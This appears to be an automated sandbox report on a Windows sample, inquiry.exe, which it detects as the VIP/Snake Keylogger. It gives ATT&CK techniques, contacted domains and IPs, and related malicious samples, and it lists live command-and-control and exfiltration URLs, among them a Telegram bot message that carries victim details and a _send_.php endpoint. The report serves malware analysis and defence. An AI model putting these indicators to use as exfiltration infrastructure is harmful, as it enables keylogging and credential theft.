Source: Yara match	File source: 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: inquiry.exe PID: 7340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7860, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inquiry.exe.1f8100a1f08.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inquiry.exe.1f8100554c0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inquiry.exe.1f81013a340.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inquiry.exe.1f8100554c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3761177777.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: inquiry.exe PID: 7340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7860, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	311 Process Injection	21 Disable or Modify Tools	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	1 Exfiltration Over Alternative Protocol	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	311 Process Injection	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	24 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
inquiry.exe	37%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
inquiry.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://varders.kozow.com:8081	0%	URL Reputation	safe
http://aborters.duckdns.org:8081	100%	URL Reputation	malware
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?L	0%	URL Reputation	safe
http://anotherarmy.dns.army:8081	100%	URL Reputation	malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://www.office.com/lB	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	0%	Avira URL Cloud	safe
https://api.telegram.org	0%	Avira URL Cloud	safe
https://www.office.com/	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2026/09/2024%20/%2003:21:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	0%	Avira URL Cloud	safe
https://www.office.com/P	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	Avira URL Cloud	safe
http://ftp.fastestpay.digital	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=en	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20a	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/8.46.123.33$	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=enlB	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=enP	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	unknown
ftp.fastestpay.digital	192.64.117.204	true	true	unknown
reallyfreegeoip.org	188.114.96.3	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
checkip.dyndns.com	158.101.44.242	true	true	unknown
checkip.dyndns.org	unknown	unknown	true	unknown
time.windows.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2026/09/2024%20/%2003:21:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/	true	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	MSBuild.exe, 0000000A.00000002.3761177777.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002AE9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	MSBuild.exe, 0000000A.00000002.3761177777.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	inquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.office.com/P	MSBuild.exe, 0000000A.00000002.3761177777.0000000002AE9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.office.com/lB	MSBuild.exe, 0000000A.00000002.3761177777.0000000002AF3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ftp.fastestpay.digital	MSBuild.exe, 0000000A.00000002.3761177777.0000000002B35000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002B23000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://upx.sf.net	Amcache.hve.15.dr	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	MSBuild.exe, 0000000A.00000002.3761177777.0000000002931000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	MSBuild.exe, 0000000A.00000002.3761177777.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=en	MSBuild.exe, 0000000A.00000002.3761177777.0000000002AC7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002AB8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://varders.kozow.com:8081	inquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002931000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://aborters.duckdns.org:8081	inquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002931000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://ac.ecosia.org/autocomplete?q=	MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?L	MSBuild.exe, 0000000A.00000002.3761177777.0000000002B23000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20a	MSBuild.exe, 0000000A.00000002.3761177777.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33$	MSBuild.exe, 0000000A.00000002.3761177777.00000000029AD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.00000000029F3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anotherarmy.dns.army:8081	inquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002931000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	inquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enlB	MSBuild.exe, 0000000A.00000002.3761177777.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org	MSBuild.exe, 0000000A.00000002.3761177777.0000000002983000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.00000000029F3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enP	MSBuild.exe, 0000000A.00000002.3761177777.0000000002AB8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	MSBuild.exe, 0000000A.00000002.3761177777.0000000002931000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	inquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	inquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002983000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
192.64.117.204	ftp.fastestpay.digital	United States	22612	NAMECHEAP-NETUS	true
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1518503
Start date and time:	2024-09-25 18:49:20 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	inquiry.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@10/10@5/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 90% Number of executed functions: 75 Number of non-executed functions: 21
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.95.65.251, 40.126.31.71, 40.126.31.69, 20.190.159.0, 20.190.159.71, 40.126.31.67, 40.126.31.73, 20.190.159.75, 20.190.159.4, 199.232.210.172, 13.85.23.86, 20.242.39.171, 52.168.117.173, 40.69.42.241, 93.184.221.240
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, prdv4a.aadg.msidentity.com, ctldl.windowsupdate.com.delivery.microsoft.com, slscr.update.microsoft.com, twc.trafficmanager.net, www.tm.v4.a.prd.aadg.akadns.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu.azureedge.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: inquiry.exe

Simulations

Behavior and APIs

Time	Type	Description
12:50:22	API Interceptor	36x Sleep call for process: powershell.exe modified
12:50:26	API Interceptor	9454676x Sleep call for process: MSBuild.exe modified
14:45:33	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	Confirmaci#U00f3n de pago_shrunk.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exe	Get hash	malicious	MicroClip	Browse
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	AS5AB7c08n.exe	Get hash	malicious	MicroClip	Browse
	file.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	z84TTREMITTANCEUSD347_432_63.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	rLegalOpinionCopy_doc.cmd	Get hash	malicious	VIP Keylogger	Browse
	Teklifformu_Ekinoks LS 1087251 04-00000152.exe	Get hash	malicious	Snake Keylogger	Browse
192.64.117.204	hesaphareketi-01_pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
188.114.96.3	Sept order.doc	Get hash	malicious	FormBook	Browse	www.rajalele.xyz/bopi/?1b=1soTE/gd/ZpFZmuHMdkP9CmM1erq3xsEeOQ9nFH+Tv+qMlBfxeqrLL5BDR/2l62DivVTHQ==&BfL=LxlT-
	1e#U0414.exe	Get hash	malicious	Lokibot	Browse	dddotx.shop/Mine/PWS/fre.php
	https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRH	Get hash	malicious	Unknown	Browse	hdcy.emcl00.com/qRCfs/
	PO23100072.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/ttiz/
	RFQ urrgently.exe	Get hash	malicious	FormBook	Browse	www.1win-moldovia.fun/1g7m/
	TNT AWB TRACKING DETAILS.exe	Get hash	malicious	FormBook	Browse	www.weight-loss-003.today/jd21/?Bl=8pSpW470ix&FjUh5xw=8QhlJgbwFiNHSz6ilu/NO/QAEgywgMMp9yv6yRtWAY1NzG57DnL+pjMXQcNu92teMaGp
	Petronas quotation request.exe	Get hash	malicious	FormBook	Browse	www.chinaen.org/zi4g/
	Shipping Documemt.vbs	Get hash	malicious	Lokibot	Browse	werdotx.shop/Devil/PWS/fre.php
	Quotes updates request.exe	Get hash	malicious	FormBook	Browse	www.1win-moldovia.fun/1g7m/
	PO-001.exe	Get hash	malicious	FormBook	Browse	www.1win-moldovia.fun/kslt/
158.101.44.242	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Pedido de GmbH.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	TT copy for SO-2409-032.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	invoice.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	2240902473.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PAYSLIP.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Drawing_Products_Materials_and_Samples_IMG.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Enquiry 88210103.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Items IMG16092024.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	E-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	z84TTREMITTANCEUSD347_432_63.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	rLegalOpinionCopy_doc.cmd	Get hash	malicious	VIP Keylogger	Browse	188.114.96.3
	cargo details.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Teklifformu_Ekinoks LS 1087251 04-00000152.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	FAKTURA_.EXE.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	188.114.97.3
ftp.fastestpay.digital	hesaphareketi-01_pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	192.64.117.204
checkip.dyndns.com	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	E-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	file.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	z84TTREMITTANCEUSD347_432_63.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	rLegalOpinionCopy_doc.cmd	Get hash	malicious	VIP Keylogger	Browse	132.226.247.73
	cargo details.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Teklifformu_Ekinoks LS 1087251 04-00000152.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	FAKTURA_.EXE.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	193.122.6.168
bg.microsoft.map.fastly.net	https://usa-usps-yd.top/us	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://docu.lafolieduocehotels.com/document/?top=cyndie.winger@steptoe-johnson.com	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	https://7wt31.croftanix.com/aaEPO/	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	https://fub.direct/1/1ZAH5Mt3Bpz8Cpn5NjLaqK_rAFuYfYbOLIjtw_PUk49CrbkVZ55QiQUv5JPS9i0PJ4bG6nuI1uhGp0DFMMhRRiMMBMgLF4xCijfUVIxAtV0/https/jogotuneldotempo.com.br/g63b/1697895341/Phocuswright/#?email=c2FsZXNAcGhvY3Vzd3JpZ2h0LmNvbQ==f0CoUObh?domain=fub.direct	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://gitq.kontra-werbetechnik.eu/AQbvv	Get hash	malicious	Unknown	Browse	199.232.210.172
	KTh1gQlT9a.exe	Get hash	malicious	SmokeLoader	Browse	199.232.214.172
	https://texicoschools-my.sharepoint.com/:f:/p/bhadley/EsaMKJ-X61dEm1tZEaws2DMBSjLuzfhGBl4pu2aaho1XiQ?e=fJogeV	Get hash	malicious	Unknown	Browse	199.232.214.172
	172726980749816c49da3d830f60283a5a8c1eb734c1073708bb8560faf023d1eb70975126808.dat-decoded.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://mir-belting.com	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://odo1s.risongeye.com/oTUk/	Get hash	malicious	HTMLPhisher	Browse	199.232.210.172
api.telegram.org	Confirmaci#U00f3n de pago_shrunk.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exe	Get hash	malicious	MicroClip	Browse	149.154.167.220
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	AS5AB7c08n.exe	Get hash	malicious	MicroClip	Browse	149.154.167.220
	file.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	z84TTREMITTANCEUSD347_432_63.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rLegalOpinionCopy_doc.cmd	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	Teklifformu_Ekinoks LS 1087251 04-00000152.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Confirmaci#U00f3n de pago_shrunk.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
